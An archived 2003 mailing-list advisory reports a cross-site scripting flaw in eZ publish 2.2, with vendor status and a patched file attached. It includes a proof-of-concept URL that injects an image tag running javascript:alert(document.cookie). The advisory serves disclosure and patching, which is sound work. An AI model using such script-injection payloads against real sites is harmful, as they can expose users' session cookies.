EzPublish Directory XSS Vulnerability

From: Ferruh Mavituna (ferruhat_private)
Date: Thu May 15 2003 - 20:22:20 PDT

Next message: Chris Knipe: "Hersmen Contact"

Previous message: Michael Howard: "Microsoft Solution for Securing Wireless LANs now available"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------
EzPublish "Directory" XSS Vulnerability
------------------------------------------------------

------------------------------------------------------
About Ezpublish;
------------------------------------------------------
PHP Based Content Management System
Vendor : http://ez.no
Demo : http://publishdemo.ez.no/

------------------------------------------------------
Vulnerable;
------------------------------------------------------
eZ publish 2.2

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
eZ publish 3

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and send a new version of this file. (attached)

------------------------------------------------------
Patch;
------------------------------------------------------
You can download patched file in attachment.

------------------------------------------------------
Exploit;
------------------------------------------------------
http://[victim]/index.php/article/articleview/[img%20src="javascript:alert(document.cookie)"]

(Replace [], <>)


Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruhat_private

application/octet-stream attachment: articleview.php

Next message: Chris Knipe: "Hersmen Contact"
Previous message: Michael Howard: "Microsoft Solution for Securing Wireless LANs now available"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 16 2003 - 08:58:35 PDT